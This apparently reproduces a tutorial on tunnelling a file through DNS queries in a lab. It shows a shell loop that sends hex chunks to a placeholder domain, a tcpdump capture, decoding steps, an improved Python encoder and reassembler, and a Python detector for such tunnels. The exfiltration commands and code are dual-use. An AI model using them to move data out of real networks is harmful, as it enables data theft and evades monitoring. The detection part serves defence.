File-transfer-via-DNS

Source: Internet  Editor: 程序博客网  Time: 2024/06/03 08:38
Original: http://www.aldeid.com/wiki/File-transfer-via-DNS

Test environment:
  • Client: 192.168.106.134
  • Server: 192.168.106.131, running the bind9 DNS server

Demo:
Encoding:
On the client, prepare a plain-text file:
client$ cat > loremipsum.txt << EOF
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
EOF

Then hex-encode it (xxd -p writes 60 hex characters, i.e. 30 bytes of the file, per output line):
client$ xxd -p loremipsum.txt > loremipsum.hex

Transferring the file:
On the server, start a tcpdump capture of the client's DNS traffic:
server$ sudo tcpdump -i eth1 -s0 -w loremipsum.pcap 'port 53 and host 192.168.106.134' 

On the client, send each line of the hex file as a fake DNS request, using it as a subdomain label (60 characters fits within the 63-byte limit of a single DNS label). In this run every dig took about 15 seconds: it got no answer within its 5-second timeout and resent the query, three attempts in total, which is why each query appears three times in the capture below. dig's +tries=1 and +time=1 options would bring that down to about a second per chunk.
client$ for b in `cat loremipsum.hex`; do dig @192.168.106.131 $b.fakednsrequest.com; done

Once all the requests have been sent, stop the capture. The queries look like this:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest
reading from file loremipsum.pcap, link-type EN10MB (Ethernet)
16:27:53.643447 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:27:58.644248 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:03.645370 IP 192.168.106.134.49731 > 192.168.106.131.53: 8314+ A? 4c6f72656d20697073756d20646f6c6f722073697420616d65742c20636f.fakednsrequest.com. (97)
16:28:08.660632 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:13.663396 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:18.664434 IP 192.168.106.134.55094 > 192.168.106.131.53: 46493+ A? 6e7365637465747572206164697069736963696e6720656c69742c207365.fakednsrequest.com. (97)
16:28:23.677182 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:28.677606 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:33.678711 IP 192.168.106.134.60005 > 192.168.106.131.53: 52118+ A? 6420646f20656975736d6f642074656d706f7220696e6369646964756e74.fakednsrequest.com. (97)
16:28:38.689582 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:43.689821 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:48.691096 IP 192.168.106.134.56318 > 192.168.106.131.53: 57751+ A? 207574206c61626f726520657420646f6c6f7265206d61676e6120616c69.fakednsrequest.com. (97)
16:28:53.702963 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:28:58.703995 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:03.705035 IP 192.168.106.134.48932 > 192.168.106.131.53: 23279+ A? 7175612e20557420656e696d206164206d696e696d2076656e69616d2c20.fakednsrequest.com. (97)
16:29:08.723883 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:13.724759 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:18.725429 IP 192.168.106.134.48334 > 192.168.106.131.53: 6065+ A? 71756973206e6f737472756420657865726369746174696f6e20756c6c61.fakednsrequest.com. (97)
16:29:23.736561 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:28.737793 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:33.738747 IP 192.168.106.134.48875 > 192.168.106.131.53: 35508+ A? 6d636f206c61626f726973206e69736920757420616c6971756970206578.fakednsrequest.com. (97)
16:29:38.793934 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:43.794793 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:48.795804 IP 192.168.106.134.54201 > 192.168.106.131.53: 47339+ A? 20656120636f6d6d6f646f20636f6e7365717561742e2044756973206175.fakednsrequest.com. (97)
16:29:53.839608 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:29:58.820917 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:03.821932 IP 192.168.106.134.40822 > 192.168.106.131.53: 27672+ A? 746520697275726520646f6c6f7220696e20726570726568656e64657269.fakednsrequest.com. (97)
16:30:08.865585 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:13.867062 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:18.868091 IP 192.168.106.134.36479 > 192.168.106.131.53: 61438+ A? 7420696e20766f6c7570746174652076656c697420657373652063696c6c.fakednsrequest.com. (97)
16:30:23.914226 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:28.914082 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:33.916140 IP 192.168.106.134.56473 > 192.168.106.131.53: 39998+ A? 756d20646f6c6f726520657520667567696174206e756c6c612070617269.fakednsrequest.com. (97)
16:30:38.967663 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:43.969259 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:48.960339 IP 192.168.106.134.33293 > 192.168.106.131.53: 22194+ A? 617475722e204578636570746575722073696e74206f6363616563617420.fakednsrequest.com. (97)
16:30:54.018795 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:30:59.019316 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:04.010034 IP 192.168.106.134.40212 > 192.168.106.131.53: 24058+ A? 637570696461746174206e6f6e2070726f6964656e742c2073756e742069.fakednsrequest.com. (97)
16:31:09.067424 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:14.068462 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:19.069481 IP 192.168.106.134.46047 > 192.168.106.131.53: 10148+ A? 6e2063756c706120717569206f666669636961206465736572756e74206d.fakednsrequest.com. (97)
16:31:24.140100 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:29.141466 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)
16:31:34.142622 IP 192.168.106.134.53254 > 192.168.106.131.53: 9356+ A? 6f6c6c697420616e696d20696420657374206c61626f72756d2e0a.fakednsrequest.com. (91)

Decoding the file:
Use a chain of cut commands to extract the hex lines from the capture (field 8 of tcpdump's output is the queried name, and the first dot-separated label of that name is the hex chunk), then uniq to collapse the three retries of each query. Note that uniq only merges adjacent duplicates, so this relies on the retries being consecutive in the capture:
server$ tcpdump -n -r loremipsum.pcap 'host 192.168.106.131 and host 192.168.106.134' | grep fakednsrequest | cut -d ' ' -f 8 | cut -d '.' -f 1 | uniq > loremipsum.hex

Now decode the file:
$ xxd -r -p < loremipsum.hex
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod
tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam,
quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo
consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse
cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat
non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
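The whole procedure above (chunk the file, send the chunks as query names, recover them from the capture, decode) as one added example in Python. It is not the page's script and not part of the aldeid write-up; the function names, constants and the sample text are assumptions made for the example. It goes one step beyond the page: each query name carries a 4-hex-digit chunk index in front of the hex label (<seq>.<hex>.fakednsrequest.com), so the receiver can collapse dig's retries regardless of their order and report lost chunks instead of silently gluing the file back together. The capture lines are constructed in the shape of the tcpdump output shown above rather than read from a pcap.

```python
import re

# Added example, not the original page's script. Assumption (not in the page):
# query names are <seq>.<hex>.<domain>, where <seq> is a 4-hex-digit chunk index.
DOMAIN = "fakednsrequest.com"
CHUNK_BYTES = 30      # 60 hex chars per label, the width xxd -p emits per line
MAX_LABEL = 63        # RFC 1035: one label is at most 63 octets
MAX_NAME = 253        # RFC 1035: a whole name is at most 253 characters in text form

# Constructed sample input (first sentence of the page's loremipsum.txt).
SAMPLE = (b"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do "
          b"eiusmod tempor incididunt ut labore et dolore magna aliqua.\n")


def encode_chunks(data: bytes, domain: str = DOMAIN,
                  chunk_bytes: int = CHUNK_BYTES) -> list[str]:
    """Sender side: split data into query names, one chunk per name."""
    names = []
    for seq, off in enumerate(range(0, len(data), chunk_bytes)):
        hexlabel = data[off:off + chunk_bytes].hex()
        name = f"{seq:04x}.{hexlabel}.{domain}"
        # Refuse to build a name a resolver would reject instead of truncating it.
        if len(hexlabel) > MAX_LABEL or len(name) > MAX_NAME:
            raise ValueError("chunk too large for a DNS label/name")
        names.append(name)
    return names


def simulate_capture(names: list[str], src: str = "192.168.106.134",
                     dst: str = "192.168.106.131", retries: int = 3,
                     drop: tuple = ()) -> list[str]:
    """Constructed tcpdump -n style lines standing in for the real capture.
    Each query is repeated `retries` times, as dig does when no answer
    arrives; chunk indexes listed in `drop` never appear (UDP loss)."""
    lines = ["reading from file loremipsum.pcap, link-type EN10MB (Ethernet)"]
    for i, name in enumerate(names):
        if i in drop:
            continue
        for r in range(retries):
            # DNS message length = 12 (header) + len(name) + 2 (wire QNAME) + 4 (QTYPE/QCLASS)
            lines.append(f"16:28:{(i * 15 + r * 5) % 60:02d}.000000 IP {src}.{40000 + i} "
                         f"> {dst}.53: {1000 + i}+ A? {name}. ({len(name) + 18})")
    return lines


QUERY_RE = re.compile(r" A\? (\S+)\. \(\d+\)$")


def names_from_capture(lines: list[str]) -> list[str]:
    """Receiver side, step 1: pull the queried name out of each tcpdump line
    (the page does this with cut); lines that are not A queries are skipped."""
    return [m.group(1) for m in map(QUERY_RE.search, lines) if m]


def reassemble(names: list[str], domain: str = DOMAIN) -> tuple[bytes, list[int]]:
    """Receiver side, step 2: return (data, missing_chunk_indexes).
    Deduplicating by sequence number makes retries harmless even when they
    are not adjacent (where the page's uniq would fail), and gaps are
    reported instead of being silently glued over."""
    suffix = "." + domain
    chunks: dict[int, bytes] = {}
    for name in names:
        if not name.endswith(suffix):
            continue                      # unrelated traffic
        labels = name[:-len(suffix)].split(".")
        if len(labels) != 2:
            continue                      # not <seq>.<hex>
        try:
            seq, chunk = int(labels[0], 16), bytes.fromhex(labels[1])
        except ValueError:
            continue                      # not one of our names
        if chunks.setdefault(seq, chunk) != chunk:
            raise ValueError(f"conflicting data for chunk {seq}")
    if not chunks:
        return b"", []
    last = max(chunks)
    missing = [s for s in range(last + 1) if s not in chunks]
    data = b"".join(chunks.get(s, b"") for s in range(last + 1))
    return data, missing


if __name__ == "__main__":
    names = encode_chunks(SAMPLE)
    data, missing = reassemble(names_from_capture(simulate_capture(names, drop=(2,))))
    print(f"recovered {len(data)} bytes, missing chunks: {missing}")
```

Run it directly to see the result with chunk 2 dropped. One gap remains: a lost final chunk is still invisible, because nothing announces the total chunk count; a terminating marker or a length field in chunk 0 would close it.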

Limitations:
On the plus side:
  • No encapsulation: the data travels as plain DNS query names, with no extra protocol layer to build.
  • The DNS requests look legitimate at a glance (ordinary A queries to port 53).
However:
  • The hex encoding doubles the size of the data, and on the wire each 30-byte chunk costs a 97-byte DNS message (before retries), so the transfer is more than three times the size of the source file.
  • It is relatively visible: a long run of queries for unique, 60-character hex subdomains of one domain is easy to spot and can raise suspicion.
  • Depending on the size of the source file, the transfer can take a long time (here about 15 seconds per 30-byte chunk, because each dig waits out its retries before giving up).
  • Unless the file is encrypted before hex encoding, anyone holding the capture decodes it as easily as the server did.
  • Packets can be lost (UDP), especially with large files, and since the chunks carry no sequence numbers the receiver cannot tell that a chunk is missing, nor reorder chunks that arrive out of order.
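To make the "relatively visible" point concrete, here is an added detection heuristic (not from the page) that a defender could run over the resolver's query log: it groups queries by source IP and base domain and flags sources that send many distinct, long, hex-looking labels under one domain. The function names, thresholds and the sample query list are assumptions constructed for the example; the sample mirrors the page's transfer (the same text split into 30-byte hex chunks, each retried three times, from 192.168.106.134) mixed with benign lookups from other hosts.

```python
import math
from collections import defaultdict

# Added example, not from the original page. Hypothetical detector: group
# queries by (source IP, base domain) and flag sources that send many distinct,
# long, hex-looking labels under one domain, the pattern the transfer above leaves.
HEX_CHARS = set("0123456789abcdef")


def shannon_entropy(s: str) -> float:
    """Bits per character; plain hostnames score low, encoded payloads high."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def base_domain(qname: str) -> str:
    """Last two labels; good enough for the example (no public-suffix list)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def looks_encoded(label: str, min_len: int = 40) -> bool:
    """A label this long that is all hex, or high-entropy, is not a hostname."""
    if len(label) < min_len:
        return False
    return set(label.lower()) <= HEX_CHARS or shannon_entropy(label) >= 3.5


def flag_tunnels(queries, min_unique: int = 10, min_encoded_frac: float = 0.8) -> dict:
    """queries: iterable of (src_ip, qname). Returns {(src, base_domain): stats}
    for every pair whose distinct first labels are mostly encoded-looking.
    Counting distinct labels (not queries) means dig's retries do not inflate the score."""
    labels = defaultdict(set)
    for src, qname in queries:
        labels[(src, base_domain(qname))].add(qname.rstrip(".").split(".")[0])
    flagged = {}
    for key, uniq in labels.items():
        if len(uniq) < min_unique:
            continue
        encoded = [l for l in uniq if looks_encoded(l)]
        if len(encoded) / len(uniq) >= min_encoded_frac:
            flagged[key] = {
                "unique_labels": len(uniq),
                "encoded": len(encoded),
                # hex halves the byte count: rough size of what left the network
                "approx_bytes": sum(len(l) for l in encoded) // 2,
            }
    return flagged


# Constructed sample: benign lookups from three hosts, plus the page-style
# exfiltration (the page's text in 30-byte hex chunks, each retried 3 times).
_TEXT = (b"Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod "
         b"tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, "
         b"quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo "
         b"consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse "
         b"cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat "
         b"non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n")
SAMPLE_QUERIES = [
    (src, host)
    for src in ("192.168.106.10", "192.168.106.11", "192.168.106.134")
    for host in ("www.example.com", "mail.example.com", "cdn.example.com") * 5
] + [
    ("192.168.106.134", f"{_TEXT[i:i + 30].hex()}.fakednsrequest.com")
    for i in range(0, len(_TEXT), 30) for _ in range(3)
]


if __name__ == "__main__":
    for (src, base), stats in flag_tunnels(SAMPLE_QUERIES).items():
        print(f"{src} -> {base}: {stats}")
```

The thresholds are deliberately conservative: some legitimate products also encode lookups into long labels under their own domains, so in production the base domains they use belong on an allowlist, and the entropy branch is what catches base64 or encrypted payloads that the hex check alone would miss.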

